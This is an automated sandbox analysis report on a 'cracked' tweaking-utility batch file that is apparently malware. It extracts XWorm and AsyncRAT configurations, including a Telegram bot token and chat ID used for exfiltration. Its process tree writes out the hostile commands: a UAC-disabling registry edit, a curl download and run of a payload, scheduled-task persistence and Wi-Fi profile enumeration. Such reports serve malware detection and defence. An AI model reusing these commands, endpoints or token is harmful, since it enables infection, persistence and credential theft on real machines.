Analysis

  • max time kernel
    148s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-07-2024 12:58

General

  • Target

    EXM_Premium_Tweaking_Utility_1.0_Cracked.bat

  • Size

    672KB

  • MD5

    33d64072e513e7945f6585d19a3ba998

  • SHA1

    4b790623eb16328d8fb76adf4e32b43cbbaf85f8

  • SHA256

    6057667756c5dbd4b66e7d856e1d045d3a05b8592cc689a7eb5a548cd0c1be4e

  • SHA512

    761a0499955f2d207ff386282f7e955ab4eb3892039e73e77a92f560ed05ac267e301b55ff80bec108db502fa428154af582b7a6b456f0a9975c42d9ab98e0e5

  • SSDEEP

    3072:ZUGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:ZUGiVNEn14IZVvisL43

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    svchost.exe

  • pastebin_url

    https://pastebin.com/raw/ZnhxAV6a

  • telegram

    https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 10 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4300
    • C:\Windows\system32\reg.exe
      Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
      2⤵
        PID:4716
      • C:\Windows\system32\reg.exe
        Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
        2⤵
          PID:3584
        • C:\Windows\system32\reg.exe
          Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
          2⤵
            PID:4048
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3660
          • C:\Windows\system32\reg.exe
            Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
            2⤵
            • UAC bypass
            PID:1904
          • C:\Windows\system32\reg.exe
            Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
            2⤵
              PID:4972
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2004
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path Win32_UserAccount where name="Admin" get sid
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4596
              • C:\Windows\system32\findstr.exe
                findstr "S-"
                3⤵
                  PID:3960
              • C:\Windows\system32\chcp.com
                chcp 65001
                2⤵
                  PID:3304
                • C:\Windows\system32\chcp.com
                  chcp 437
                  2⤵
                    PID:5012
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -ExecutionPolicy Bypass -Command "Checkpoint-Computer -Description 'Exm Premium Restore Point' -RestorePointType 'MODIFY_SETTINGS'"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1396
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    2⤵
                      PID:4120
                    • C:\Windows\system32\chcp.com
                      chcp 437
                      2⤵
                        PID:3592
                      • C:\Windows\system32\curl.exe
                        curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
                        2⤵
                          PID:3596
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4988
                        • C:\exm\EXMservice.exe
                          EXMservice.exe
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2540
                          • C:\Users\Admin\AppData\Local\svchost.exe
                            "C:\Users\Admin\AppData\Local\svchost.exe"
                            3⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4800
                            • C:\Windows\System32\schtasks.exe
                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Local\svchost.exe"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:3716
                          • C:\Users\Admin\AppData\Local\dllhost.exe
                            "C:\Users\Admin\AppData\Local\dllhost.exe"
                            3⤵
                            • Executes dropped EXE
                            • Drops desktop.ini file(s)
                            • Checks processor information in registry
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1892
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4436
                              • C:\Windows\SysWOW64\chcp.com
                                chcp 65001
                                5⤵
                                  PID:4420
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh wlan show profile
                                  5⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  PID:448
                                • C:\Windows\SysWOW64\findstr.exe
                                  findstr All
                                  5⤵
                                    PID:4676
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1916
                                  • C:\Windows\SysWOW64\chcp.com
                                    chcp 65001
                                    5⤵
                                      PID:1652
                                    • C:\Windows\SysWOW64\netsh.exe
                                      netsh wlan show networks mode=bssid
                                      5⤵
                                      • Event Triggered Execution: Netsh Helper DLL
                                      PID:1952
                              • C:\Windows\system32\chcp.com
                                chcp 65001
                                2⤵
                                  PID:4024
                              • C:\Windows\system32\vssvc.exe
                                C:\Windows\system32\vssvc.exe
                                1⤵
                                • Checks SCSI registry key(s)
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1600
                              • C:\Windows\system32\srtasks.exe
                                C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                1⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3924
                              • C:\Users\Admin\AppData\Local\svchost.exe
                                C:\Users\Admin\AppData\Local\svchost.exe
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3352

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\8e03de05524ba295ed2d8150bbad9103\msgid.dat

                                Filesize

                                5B

                                MD5

                                ad52498830facdfb560d81b5620b66ae

                                SHA1

                                7123fa003c0a3291b965d0a16f405c73cfbc7477

                                SHA256

                                b66cc90a512fa6d12f36f42297680c780ff65010015354d5f149a59ecb1c6b0d

                                SHA512

                                f773fce46a9a8e4d61630ae0a21e7748c943f346e85cccc74a69e21b16b5b0079af0393456030f9d7f680d6009f7fe99f9371297b309073e6b39fdfab79f5be4

                              • C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\System\Process.txt

                                Filesize

                                4KB

                                MD5

                                24a32c30c5e04538960049b49ac9f406

                                SHA1

                                1e6294d58493084495635d8c7f91283ea9b71dd7

                                SHA256

                                fe94c3e8feffde43a2aff2b4af310cb61c557863d95ad73362f13dcead0006b8

                                SHA512

                                a47cb2c9bc2937f6cebb83d0839440da5c13adac3b263d95174e04956608f7a0cf0a80a7c22a7e95bf7044b4509a972c8d30a93a2ee0a86fafb6d64a43baf01c

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                Filesize

                                2KB

                                MD5

                                6cf293cb4d80be23433eecf74ddb5503

                                SHA1

                                24fe4752df102c2ef492954d6b046cb5512ad408

                                SHA256

                                b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                SHA512

                                0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                64B

                                MD5

                                5caad758326454b5788ec35315c4c304

                                SHA1

                                3aef8dba8042662a7fcf97e51047dc636b4d4724

                                SHA256

                                83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                SHA512

                                4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                64B

                                MD5

                                446dd1cf97eaba21cf14d03aebc79f27

                                SHA1

                                36e4cc7367e0c7b40f4a8ace272941ea46373799

                                SHA256

                                a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                SHA512

                                a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iknl51pn.w2y.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Users\Admin\AppData\Local\Temp\exm.zip

                                Filesize

                                17.6MB

                                MD5

                                398dd2d428bb6073e7e370783a827855

                                SHA1

                                392a4ac9f34a8e5b0d5b360b20aa7ffac1fee68a

                                SHA256

                                c28c6c53a53b80e84c1d3dc668e332bc4e8e2fb39a1702293358bbfff046a542

                                SHA512

                                4f6eb16fc7e01813bd559c738c82d628d94d557d3360bbec8fa147478206b10203bb4a5baa7eb85fd16c8fa5d0caa727a07d1ecbc6b69c8012aceca4d975de68

                              • C:\Users\Admin\AppData\Local\dllhost.exe

                                Filesize

                                225KB

                                MD5

                                8008775094d446eaed43a423cd8a26f9

                                SHA1

                                4b8ef16e4a70fed23dc20cc5e27566df1e06af04

                                SHA256

                                48a06f8dbe0c56894b38bb3489c8ed5243d246328c512ee265bc31de441b5e1f

                                SHA512

                                6d9f2dca0d9032702971b339b7df65efab1c95d76e89044cf36ed43ef3116d21d1203d1561bd5fb4bd838d4df3dfbd240e2c89b715400f7a89037a3757326792

                              • C:\Users\Admin\AppData\Local\svchost.exe

                                Filesize

                                101KB

                                MD5

                                d6ed35edaa98e23f868bfecc878cd41c

                                SHA1

                                f8c02621df609a4ee7ccdd0c840ba7b2cb5119d8

                                SHA256

                                5e04cf41691801a80a63e9f479dba3e4deffcaab11505ad0b23ddbcbace3f77d

                                SHA512

                                d22f5dcb33e07fe342140199356172e9cde0954c0ebe2021678bdeb8e6bee00fbbaa95dbbbea681c8283e73864522cad7b8d1f336b832bce113db6a3fbdd491f

                              • C:\exm\EXMservice.exe

                                Filesize

                                343KB

                                MD5

                                7b2774daa729996f901ab01b47696ea0

                                SHA1

                                86960c537dabe18846e061ebf1a8762ba441ea53

                                SHA256

                                5827b18e8c318476278be7e4da2cc165dfd5401122661a8727e275ab1b7ab6e2

                                SHA512

                                0fc1d640ffa4dd2b2d5af9e54bb90788e5719db954dca86035a5203c52f6f88d56ae22f2e2642472aa599bf989e8fdd07c087749ba60603457d57d006fdecfe6

                              • memory/1892-110-0x0000000000320000-0x000000000035E000-memory.dmp

                                Filesize

                                248KB

                              • memory/1892-273-0x00000000059E0000-0x00000000059F2000-memory.dmp

                                Filesize

                                72KB

                              • memory/1892-267-0x0000000005990000-0x000000000599A000-memory.dmp

                                Filesize

                                40KB

                              • memory/1892-263-0x0000000005EC0000-0x0000000006464000-memory.dmp

                                Filesize

                                5.6MB

                              • memory/1892-262-0x0000000005870000-0x0000000005902000-memory.dmp

                                Filesize

                                584KB

                              • memory/1892-111-0x0000000004D60000-0x0000000004DC6000-memory.dmp

                                Filesize

                                408KB

                              • memory/2540-85-0x0000000000B00000-0x0000000000B5C000-memory.dmp

                                Filesize

                                368KB

                              • memory/3660-11-0x00007FF94C2A0000-0x00007FF94CD61000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/3660-12-0x00007FF94C2A0000-0x00007FF94CD61000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/3660-15-0x00007FF94C2A0000-0x00007FF94CD61000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/3660-0-0x00007FF94C2A3000-0x00007FF94C2A5000-memory.dmp

                                Filesize

                                8KB

                              • memory/3660-6-0x000002D76EA30000-0x000002D76EA52000-memory.dmp

                                Filesize

                                136KB

                              • memory/4800-105-0x0000000000F50000-0x0000000000F6E000-memory.dmp

                                Filesize

                                120KB

                              • memory/4988-40-0x0000026C20D90000-0x0000026C20D9A000-memory.dmp

                                Filesize

                                40KB

                              • memory/4988-39-0x0000026C20DA0000-0x0000026C20DB2000-memory.dmp

                                Filesize

                                72KB